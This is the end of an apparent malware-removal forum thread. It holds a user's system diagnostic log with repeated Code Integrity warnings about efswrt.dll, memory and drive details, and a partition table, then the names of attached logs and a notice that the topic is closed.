Date: 2016-03-23 16:45:46.118 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-03-16 15:42:58.774 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-03-10 18:25:28.930 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-03-10 12:06:06.024 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-03-02 18:14:41.587 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-03-01 15:48:48.930 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. 
==================== Memory info ===========================

Processor: AMD A8-7410 APU with AMD Radeon R5 Graphics
Percentage of memory in use: 85%
Total physical RAM: 3529.01 MB
Available physical RAM: 503.86 MB
Total Virtual: 4481.13 MB
Available Virtual: 1414.03 MB

==================== Drives ================================

Drive c: (Windows) (Fixed) (Total:910.68 GB) (Free:853.86 GB) NTFS
Drive d: (RECOVERY) (Fixed) (Total:19.64 GB) (Free:2.24 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 07FA63C3)

Partition: GPT.

==================== End of Addition.txt ============================

4 - 2 Log.txt

Malwarebytes log.txt


  • 2 months later...
Guest
This topic is now closed to further replies.